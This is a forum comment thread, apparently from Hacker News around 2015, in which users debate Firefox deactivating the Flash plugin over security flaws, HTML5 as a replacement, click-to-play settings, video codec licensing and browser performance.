The final act of HTML5 delusion - it becomes "ready" because we say it's "ready". It's just someone forgot to ask Flash (game) developers' opinion. Not that it matters, right?
You really think the opinion of game developers should matter in a discussion about how to make browsers reasonably secure for people to use without getting their hosts compromised? Because I don't.
Anger towards browser developers or HTML5 is misplaced; you should be angry with Adobe for the fact that Flash is buggy, insecure, and closed-source.
>You really think the opinion of game developers should matter in a discussion about how to make browsers reasonably secure for people to use without getting their hosts compromised? Because I don't.
I agree, which is why I wish browser vendors would block WebGL by default.
I'm not holding my breath though, because the reality is that market demand from people like game developers (or at least, perceived demand) is what is driving the addition of so many complex new APIs to the web.
It's 2015 and it has been clear for at least 5 years that Flash was going to die eventually. If you still haven't migrated away or - worse - are still developing new apps in Flash, it's your own fault.
And since when you have to please everybody ? Flash developers are a minority, and they have no power to influence the market.
The sooner Adobe abandons the dead horse, the better for all of us. Kevin has gone away for years now, and Adobe's force is not based on Flash anymore (disclaimer: I own Adobe stock)
Its not like html5 has all of the features required to replace flash cross platform.
These changes force developers, especially those that work in video publishing to implement a variety of implementations for each device whereas flash gave us one platform that technically works on everything but is now disabled intentionally.
From the outside looking in, I have to imagine this has been on the industries radar for a while. I mean flash has had some pretty steady hate for a while, coupled with advances with other mechanisms becoming increasingly robust. It may create more work but surely work that was not unexpected.
what, re-implementing their tech on a multitude of different browsers on desktop machines that previously worked fine?
I'm just pissed because IMO flash is being removed before the cross platform media objects in html5 have been implemented in full across all the browsers.
I'm just disappointed that browser makers caved to Flash-using media companies demands and added closed-source DRM to the HTML spec. Thank you for demanding such an awful misfeature, Hollywood. Our starving culture will forever be in your DMCA debt.
I did the "click to activate" option for flash in firefox. I like it. (Safari and chrome can do this too). This way if flash is activated when really needed.
I feel your pain. The university site I'm working on has flash protein visualizations. We're finally moving visualizations to js. We'll get there, but with flash being kinda turned off, users will have to turn it back on manually or our pages won't work till rid of flash.
Yesterday I was browsing a technology blog on my iPad and a javascript pop-up banner appeared over the page. The X button in the corner didn't work, I tapped it about 20 times. So I reloaded the page. Same thing happened. To read the article I had to disable javascript in the Safari settings and reload page.
If you think unwanted annoyances only come from Flash, you're mistaken.
God will Flash just die already. Firefox is my primary browser and I run it without Flash. On the very odd occasion I need it I have IE in protected mode which has Flash built in. If a site does use Flash I will seek an alternative though as I hate it that much.
On a side note Firefox without Flash is so much smoother. IMHO it is the fastest and most stable browser when it doesn't have Flash bogging it down.
5 to 7 years ago I would have said the same thing, I hated Flash with a passion. But now, when it's almost gone for good, I see that it had its reasons. For example the new Google Street View is many times slower and lags so much as to give me motion sickness (when it's not blocking my browser) compared to the previous version, which was Flash-based, and which used to work like a charm.
The new Google Maps is also dramatically slower, laggier, and buggier than the old version which was a regular web app built to work on browsers from 2005.
I think the terribleness of recent Google web front-ends (not only Maps and Street View but also Search, Mail, Groups, Gplus, etc.) is mostly a product of incompetent management process internal to Google, rather than an indictment of web technology generally.
I've gone back to a desktop mail client (Thunderbird) and moved away from the web for this sort of thing myself.
As far as the web goes, I am very impressed at openstreetmap. That is fast, accurate and has more useful mapping data than anything else rather than fancy overlays and imaging.
While on vacation recently, I had to switch from Google Maps to OSMAnd. OSM map data was just as good for my purposes at least (arguably better), but the real motivating factor was just how fucking pathetic Google Maps on Android has become.
Just having it find my location became a chore. I'd be walking down the street looking at my phone the whole block, waiting for it to get my location. Many times it would show my location (with several miles of uncertainty) as being somewhere that I had not been for more than several hours. Other times it would just never find the location at all, not even having any idea what country, let alone city, I was in.
I downloaded OSMAnd and the province map data, and it was able to find my location within mere seconds every time. It was able to do it fast enough that if I clicked the power button as I was pulling my phone out of my pocket, it would have my position before my phone was in front of my face.
Unfortunately OSMAnd does not do transit routing, so I was attempting to use both at the same time. This gave me a direct comparison between how fast both were able to find my position, and how accurately. OSMAnd blows Google Maps away. I often resorted to typing in my "from" location in Google Maps, just so that I could use it to find routes for me while it was stalling on finding my location itself.
My location permissions were all correct. I tried wiping the application settings, with no luck. On the last day of my vacation I uninstalled all the google maps updates on my phone, and tried the version that shipped with it. It worked just fine.
If anybody else ever gets annoyed at Google Maps being unable to find their location in a timely manner, I highly recommend they try OSMAnd. It saved my vacation. As a bonus, it even behaves sensibly when on a boat.
Could never reproduce it consistently, and I'm always hesitent to file a bug without decent repro steps. Also, it seems to have been fixed in latest... maybe. Again, if I can't reproduce it consistently, I can't say if it's fixed or not.
So what I do in these situations is go to about:crashes, click on the appropriate crash id and look under the Related Bugs section. If there’s been a bug filed with the same signature then it’ll appear there. Alternatively, if it’s not been filed already you could click on ‘More Reports’ and look at the number of crashes. If it looks like a few you might want to file it with just the signature and no steps to reproduce; sometimes a signature and backtrace alone is enough to diagnose and fix (e.g. this one I filed recently: https://bugzilla.mozilla.org/show_bug.cgi?id=1163945 ).
The first version they bought and re-branded. The second version was developed in house using the purchased technologies. It's sad the stuff developed in house seems to be worse.
Flash should still have its legitimation as an authoring tool. I think the direct approach in which you can throw together a scene or an animation has its value. The tools you use influence design decisions. Of course, technology wise, we should be happy without it. But if you always start a project with coding first, it limits your thinking. I fancy all the nice webgl demos and data visualizations, but they mostly lack a meaningful human perspective. Authoring tools like Flash and Director did provide a different feedback loop, not a data point of view but a narrative one.
The company I work for makes interactive/animated training media. While I work as a coder doing mostly server-side stuff, I can vouch for the power that the Flash authoring environment provided. It was rather similar to something like Unity, with a tightly integrated scenegraph and coding environment. For our team of animators who (by necessity, not by choice) picked up some coding chops on the job, it was a huge blessing.
Moving everything over to web technology has been extremely painful for exactly one reason: lack of a decent authoring workflow for interactive animations. There's nothing that can even touch Flash in this regard.
Unfortunately Flash still fills a couple gaps in browser support: live video streaming and adaptive bit rate streaming (live or recorded).
I posted a similar comment about it the other day: [0]
Personally I would like to see HTTP Live Streaming (HLS) [1] implemented in the all the browsers, it's a nice lightweight protocol and would be the path of least resistance since it's already used heavily in the mobile space.
Agreed. I was looking into this streaming/live video issue as well and there really is no cross platform method of doing this without having a Flash fallback.
For everything else however (like pre-recorded video, games via WebGL), Flash should be phased out.
Even for pre-recorded video you still need Flash if you want to implement adaptive bitrate streaming in order to provide multiple quality levels and have the client automatically switch between them rather than buffer.
> On a side note Firefox without Flash is so much smoother. IMHO it is the fastest and most stable browser when it doesn't have Flash bogging it down.
That is primarily because of the flash ads being dumped. An ad/flash/js blocker achieves much the same and then some by further reducing the latency to collect everything needed to render.
Tidal and Deezer are others which require flash. Both have desktop apps, however.. Tidal's desktop app is awful and laggy to the extent I prefer using the web interface; Deezer's Windows app lacks some features compared to the web player.
For browsers that support EME, they can use the "Clear Key" key system that is part of the EME standard. It's not as secure as other DRM (because the decryption key is briefly exposed on the client), but it does not require any third-party license server like Google Widevine, Microsoft PlayReady, or Adobe Primetime. For a streaming music service, it is probably an adequate deterrent for ripping streams.
Every video on Facebook still relies on Flash though. So I'm not sure why they haven't put their money where their mouth is about it yet? Would make Facebook a lot more accessible in most cases for me not having to rely on Flash whatsoever just to view a video. I usually end up not watching a number of videos after I realize it wont let me watch them without Flash.
Facebook is migrating from Flash to HTML5 video. As of last week, they are serving HTML5 video to users running Windows 7+, including Firefox users. Firefox supports H.264 video on Windows Vista+ and OS X because those platforms ship H.264 decoders.
Will someone actually go ahead and implement the required features in the browsers? Last I checked there is still no cross-platform way to do video publishing without flash. The option we now all have is multiple platform specific implementations.
Mozilla performance dev here: Our data backs this up. 4 out of 10 of our top most frequent janks are due to Flash initialization. I'm working to make that all work asynchronously until the time comes when we can kill NPAPI altogether.
I find "Click to Play" makes for a better browsing experience, and think this is a fine move for Firefox.
Interestingly, Google Chrome recently moved in the opposite direction, and removed support for having Flash off by default and activating with a single click. Instead, they consider Flash to be "important plug-in content". While they allow you to have it off by default, rather than "click to play", they now require that you right click then pull down to "run this plugin" each time you want to activate: https://productforums.google.com/forum/#!topic/chrome/xPcpRB...
I presume this is because they want to discourage people from having Flash off by default, since this would mean they would miss too many Flash ads. I took this as an opportunity to try out some different browsers, and found that Opera met my needs slightly better than Firefox. If you are looking for an alternative to Firefox or Chrome, or just want to see what's out there, you might want to check it out too: http://www.opera.com/
ps. As an example of the new Google interface strategy, to show all the responses on the Google Chrome Help Forum link above rather than being forced to click on each one, you can press the 'o' key some random number of times until they appear: https://productforums.google.com/forum/#!topic/gec-answers-f...
I've seen this argument, but don't believe that removing the option for click-to-play improves security. I'd could believe this theory if the default was simulataneously changed to have Flash default to off, but as it is, the result is that more users will choose to keep the default where Flash always on. Surely automatic activation is even less secure than a potentially hijackable click-to-play?
I don't believe the small mechanical difference in click activation actually makes a huge difference to uptake numbers, since the big leap is making the choice to have plugins not run by default, with the activation path making no noticeable difference since by then you've already filtered out most people, who just don't care about plugin activation. This feature is driven by the Chrome security/privacy teams, who would have reverted it by now if they saw a regression in usage.
I've been click to play on Firefox for a long time now. Faster, less annoying ads (I am okay with nonannoying ads; they help pay for the site), and sites rarely need flash anyway. I think only Gmail and github (for click to copy) need it
I uninstalled Flash a few days ago, because I didn't want to deal with the updates anymore. Since Flash was unbundled from Mac OS X it has become a pain to update. I simply don't understand why I need to go to the Adobe site to get the updates.
Flash isn't super relevant anymore anyway, the main thing it's used for on my computer is Flash tracking cookies, and I can do without those. I do wonder how some of the tracking and retargeting companies will deal with the decline of Flash though. We asked a partner to stop using Flash for tracking, their response was that it's the best way to doing user tracking. Hopefully they'll change their mind soon.
The update process is horrendous. Redirect to Adobe's website, follow a 3-step 'wizard' - where Step 2 is a placebo 10-second loading bar saying it is "initialising" - and Step 3 is an advertisement for installing other crap from Adobe.
After all that you have to download a DMG, close all your applications and reinstall from scratch. Why not just build in an auto-update in the background and be done with it...
On Windoze, I always go to google for "flash player distribution3" and install the MSI packages for enterprise deployment. That keeps me from the malware bundle.
On the Mac, it's easy, I use Chrome as my Flash jail. I use Safari all the time and the few times I need Flash I fire up Chrome and it's there. Don't have to worry about Flash hacks or Chrome battery drainage.
The only other place where I've found that flash is relevant is in auto-play videos, so now with flash installed but disabled is basically removing the auto-play 'feature', which is really neat.
Unfortunately in this case avoiding the problem won't make it go away.
Many old sites will stop working (my first site was done in flash) as well as many games that are still heavily played today by millions of people. Also flash IDE provides a good introduction to programming for self-taught kids these days: many of them still do their first code in flash after clicking on "that strange icon next to photoshop".
Overall this is a good example of prolonged trusting a binary blob. IMO we will always tend to do what is more comfortable and we should strive for openness and transparency in the tools that most people rely for everyday.
The problem persists as long as there are people installing the plugin or "enabling" it.
We need a real open-source alternative to flash player.
> We need a real open-source alternative to flash player.
We quietly built the alternative to Flash over the last 10 years. It's called the web.
A standard document in the web browser can play audio, video, display vector graphics, utilise OpenGL, supports direct drawing via Canvas, and it is deeply scriptable with a mature, open programming language.
I need all of those things to look exactly the same in each and every browser, instead of corrupted icons or broken navigation because the developer tested it in Chrome for Windows but neglected, say, Iceweasel for Debian.
I have yet to find a non-flash game capable of doing that. And if the alternative is "we should discard this closed binary that works in every platform in favor of this free-but-browser-dependant stack", I find that odd.
Well then you don't want an open source Flash, because that will undoubtedly be different to the official one in the same way that browsers are different to each other.
The age old test of any platform is the ability to run games, and HTML5 just isn't there when put next to Flash or native apps. And I'm not talking the bleeding edge stuff, but simple things like getting sound to work between browsers (a task that Flash did very well). Although to be fair the gatekeepers of browsers are Apple and Google who want you to pay the app store tax.
Why? Copy FROM clipboard would be, sure. Copy TO clipboard... OK, I can come up with scenarios where it'd be a problem, but they're pretty far-fetched.
Run a timer overwriting your clipboard every 10ms. Prevent you from copying anything off a webpage and instead replacing it with a copyright notice. Etc., etc., etc.
Flash has offered these same clipboard APIs for years and these clipboard "attacks" have never been a problem before. I don't see how replacing Flash clipboard APIs with HTML clipboard APIs will change web developers' behavior.
That's like saying “The ‘Web’ can't display images, the ‘Web’ needs plug-ins to do so. Plug-ins like libjpeg or giflib”.
Right now, you can put a <video> or <audio> tag on a page and it will work in something like 95% of the browsers in use. That's already better than Flash and going up as IE8 users upgrade to newer versions of IE or install Chrome/Flash.
Sure, you can't rely on users not recompiling their browser to disable it but you also can't rely on 100% support for anything on the web – users disable image loading, plugins, stylesheets or JavaScript, install incredibly overzealous ad-blockers, use ISPs which tamper with page contents, etc.
When i wanted to start programming one of the things I tried was flash. I absolutely couldn't figure out what the fuck was going on even with tutorials, it's garbage.
That's strange, I found Flash programming very accessible. There's a huge amount of good learning material out there, and plenty of shortcuts and components you can use to do quite complex things.
Flash components were really interesting, and made it easier for non-programmers, or designers to manipulate a user-friendly "API" of sorts within Flash. This was very powerful. Hugely underrated and conventionality forgotten by the Flash-haters.
In terms of accessibility, my first two "serious" coding projects in high school were an interactive library map and a Latin flashcard quiz game written in Flash and Perl, respectively. At the end of the projects, I decided to focus my efforts on the more intuitive of the two languages, Perl.
Granted, it's just an anecdote, but I wonder what I missed that made others find Flash so accessible.
In my experience at least, when I talk about "Flash programming" I'm not just referring to Actionscript, but the whole package, the whole Flash suite including manipulating the timeline and multimedia objects programmatically.
Sounds like you favour Perl over Actionscript. From what I know of both, they are not commonly compared! But as with many things in this business, it all depends on your needs, likes, and the project requirements.
When all browsers disable Flash, a ton of old artistic content will become unaccessible. I'm thinking specifically about Homestuck animations and minigames, but other people will have their own favorites. Is there a good transition plan?
However, it will also make it more secure by making it less of a target for hackers. If you have to enable it only for certain content … then great. That’s how it should be at this point.
I've been maintaining the FreeBSD port of the Flash 11 linux software for a year or so.
The one thing I have learned during that time is:
How to write a good VuXML entry.
I agree with the general sentiment of removing Flash, and will do my part in convincing others that FreeBSD (and, derived, PC-BSD and FreeNAS) should probably consider setting an expiration date for Flash, then at that date delete it.
I made it my new year's resolution in 2015 to have Flash disabled. For my use case, it works great. Longer battery, less heat, and the internet still works.
I do turn it on (enable) every now and then for some sites, but very few/infrequently and turn it off right after.
I have all plugins disabled by default on my Chrome. I assume it's mostly Flash. It's very little disruption, actually:
* Plugins can be enabled using one click;
* The "Copy shortcut" widgets are disabled by default. Too bad, 2 clicks instead of one.
* Some videos are disabled on some news website. Too bad they won't be able to auto-play.
* I very rarely encounter websites (less than once in a month) where invisible plugins are required, so I need to restart the page with all plugins activated. I think Google's Not-a-robot Captcha has difficulties with that, if I remember well.
"All versions of Adobe’s Flash Player plugin are currently deactivated by default, until Adobe releases an updated version to address known critical security issues."
This implies that it will be reactivated soon and this isn't a permanent block. It looks like the same mechanism that blocks old and vulnerable versions of plugins like Silverlight.
That said, I've not installed flash in years. I use Firefox as my main browser with no plugins and IE/Chrome have it embedded (both auto-update with no system restart required).
Flash always have security issues and Adobe do their best to fix them.
On the consumer side of things, flash is not so bad. Sure search engines couldn't read it but there is amazing content generated through it. The content is,what matters and unfortunately the Web is littered with abusive flash objects auto playing videos, audio, full screen ads and those won't simply go away with flash.
At least with flash I can easily disable it. But those auto playing html5 videos and audios ads are just as annoying. Now I need plug ins to disable native capability.
It's only a matter of time until all ads move to the medium and we find ourselves complaining.
It's not really a matter of ads, ads move the internet so they will always be there. It's a matter of security, flash has always been a source of flaws to be exploited. Like.. always, sometimes "trying their best" was really not effective.
I wonder how the ad networks/agencies will respond to this if it becomes the norm across future competing browsers?
Flash ads (including video) can be horrid on CPUs, but they also often have higher CPMs than static, "cheaper" ads. Firefox seems to be blocking flash entirely. They’re also doing it in a way that the ad networks can’t tell, unlike Chrome. In other words, if I disable Flash in Chrome, the ads normally fall back to (cheaper) non-flash ads. On Firefox, I’m getting blank gray boxes.
For sites that depend on advertising to survive, hopefully the ad networks will update their inventory with alternative non-intrusive ads a.s.a.p. so this type of (admittedly much needed) evolution doesn't suck too many content providers down.
Good riddance. Hopefully, they not only deactivate it but remove Flash and Java altogether. These two have been nothing but constant security and performance issues. And without Flash, Firefox can finally work on GTK3.
Good new for you. In September 2015 Google going to completely remove NPAPI support from Chrome. So Unity3D plugin will no longer work in Chrome and likely noone will use it for new projects.
I have Chrome with flash installed (not that it gave me any choice), but other than that I haven't had flash for maybe two years. If I need to play Flash, I just open Chrome for that. Facebook is one of the last common offenders with its flash videos on desktop version. I can't comprehend why...
AFAIK, the only way for javascript on a website to copy something into your clipboard is through Flash. It might be a good thing to prevent such functionality, but I wonder if Firefox took this into consideration.
I find amusing that visiting that same page triggers the 'Firefox has prevented the outdated plugin "Adobe Flash" from running on support.mozilla.org.' warning.
Looks like Chrome now deactivates Flash by default now too - it says "Adobe Flash Player was blocked because it is out of date" & I get directed to this link https://support.google.com/chrome/answer/6258784
Edit: Ah, looks like I needed to update Chrome with the fix.
Keep in mind that flash plugin that bundled with Chrome using PPAPI and running inside sandbox. So some exploits don't affect that version all due to different architecture and to escalate privileges some Chrome sandbox exploit would be needed as well.
If only Firefox actually supported my AMD APU, then I wouldn't have to use Flash for YouTube and such. I actually force YouTube to play using the Flash player, as with HTML5 the video freezes and is very choppy. My mother is using Linux Mint, and for her the reverse is true, Flash is horrible and HTML5 is smooth and fast.
Sounds nice, but sometimes I'm on a page in Safari (with Click To Flash active) and I can't get a page to load at all after "clicking to flash" once. I think there must be some additional flash file that I don't get the chance to click or some moment that passed so it can't load.
I've been trying to solve this on Ubuntu 14.10. There does not seem to be an update path. I've installed the deb on https://get.adobe.com/flashplayer/ which does not resolve it.
"All versions of Adobe’s Flash Player plugin are currently deactivated by default, until Adobe releases an updated version to address known critical security issues."
I uninstalled/disabled flash on all my systems a few months ago, and have noticed barely any impact on my browsing. The only site I can think of that doesn't work is BBC News.
Adobe promising an update "during the week of July 12th"... That was last week. Or are they for some reason counting last week's Sunday as part of this week?!
Seems like only a temporary block. Mozilla isn't brave enough to put it out of its misery like it belongs. Still some big sites using it though, like Twitch.
My firefox has been blocking flash for a while (I've not updated it, so it doesn't load the old version.). The only site I switch to Chrome for has been twitch.
For anything else html5 video has been generally working. I've noticed a lot fewer annoying adverts too which is a bonus.
If Mozilla finally managed to implement the encoding Twitch uses for mobile devices, I'd finally be able to uninstall that pile of shit. Sadly it's a licensing issue.
If only that were the case, but they're abandoning Silverlight. It was actually much more stable for me under Linux than Flash ever was sadly, but they stopped developing Moonlight as well.
This is terrible for anyone who relies on Flash to get any kind of interactivity going inside the FB timeline.
It would have been better if FF would just display a warning and then let the user decide if they want the Flash content blocked or displayed.
Obviously it would be even better yet if FB would finally allow interactive HTML 5 content in its timeline.
he could meant JDK, the server runtime many things in Java. and I know the thread Im posting. you do not need to tell me. You do not need to mention it like that.
Why on earth should Firefox ship a different HTML5 engine for Linux than for the other OSes? To me, it doesn't make a lot sense to assume Firefox provides a better HTML5 implementation for all other operating systems.
With all due respect, this comment seems to be more of an overall anti-Linux sentiment.
Actually, Firefox uses the platform decoders to decode patented codecs like H264 or AAC. So the operating system does play a role. I also think it's not unreasonable to believe that hardware accelerated H264 decoding works less well on Linux.
Good catch. So replacing "HTLM5" with "video codes", this may have a point.
But I'm still wondering, as we have very good decoders from projects like FFmpeg and VLC. (Not sure which of all those decoders are used by Firefox.) These are platform independent and to my experience better than the platform specific libraries.
For example, I often hear that people install VLC under Windows because it decodes lots of video formats better than the natively available Windows Media Player. So the native Windows libraries probably aren't that good.
Also, at least the FFmpeg project explicitly states that they don't care about patent FUD, so we can safely assume they don't cripple their decoders in the fear of violating patents: https://www.ffmpeg.org/legal.html
Firefox can actually use ffmpeg as a decoder. It would be a great option for supporting a lot of these formats. However, Mozilla can't ship it enabled, because the patent problem is very real. See, for example, all of the Play Store apps that got C&D letters from Dolby for using ffmpeg's implementation of AC3.
Firefox does ship a lot of other video and audio codecs though, such as vorbis, opus, theora, vp8, and vp9. It's recommended to use these for HTML5 when possible because they can be easily supported everywhere.
Just a minor nitpick: Under Linux, people don't download from Mozilla but have it installed by default. If not, they install via package manager and not via download from Mozilla.
So it's not Mozilla making that decision, but the respective Linux distros. But of course they have the same problem.
I believe a good compromise would be to check if ffmpeg is installed on the system, and use it only when available. So the user would have to install ffmpeg directly.
That would be a very different situation from including code from ffmpeg directly into some app.
One option was to go down the Click-to-Play route which offers a HORRIBLE UX. Especially on Youtube which still uses Flash by default.
Disabling Flash however, Youtube actually seamlessly falls back to HTML video. Well done. But I can't help but think, outside the Youtube world (BBC for e.g.). LOTS is going to break. I wouldn't take this tact with my parents or clients.
This is something that Safari on OS X gets so right, that I've long been amazed (and annoyed when I have to use other browsers) that the other browsers don't copy the functionality.
In Safari, if you tab out a new page, it will load the content but pause it until you show the page. So you can tab out a bunch of video pages and they each only autoplay when you tab through them.
Wanting the same functionality on Chrome seemed to involve plugins or clicking (which has now turned into right clicking and choosing play).
If you disable Flash completely then Youtube works fine with HTML5 video. However, when Flash is set as click to play then Youtube still prompts to enable Flash. Annoying.
I'm late to respond to this, but this is really not true (speaking as a several-year (and current) user of click to play Flash).
I would suggest checking the https://www.youtube.com/html5 page sp332 suggested to see if you have checks in all those boxes and making sure you're using a recent version of whatever browser you're running[1]. Only if your browser doesn't support the needed html5 video features does it switch back to flash.
You can use this page to see if your browser will use HTML5 by default, and set a cookie to try HTML5 instead of Flash if it's not the default. https://www.youtube.com/html5
To be clear, by "blocked" Flash we really mean enforced click-to-activate. User choice is always a #1 priority at Mozilla.
We regularly block vulnerable plugins. What made this block different was that we did it before Adobe made an update available. Now that Adobe has released an update, it is no longer true that every version of Flash Player is blocked in Firefox.
However, we're glad to see the conversation this has sparked. Personally I align with Alex Stamos regarding Flash, in the thinking that a formal EOL would be great.
I'd also like to use this space to make a shameless plug for Shumway, a project set on building a faithful an efficient renderer for the SWF file format without native code assistance. Ending Flash doesn't need to mean an end for Flash media. http://www.areweflashyet.com/shumway/
Edit: typo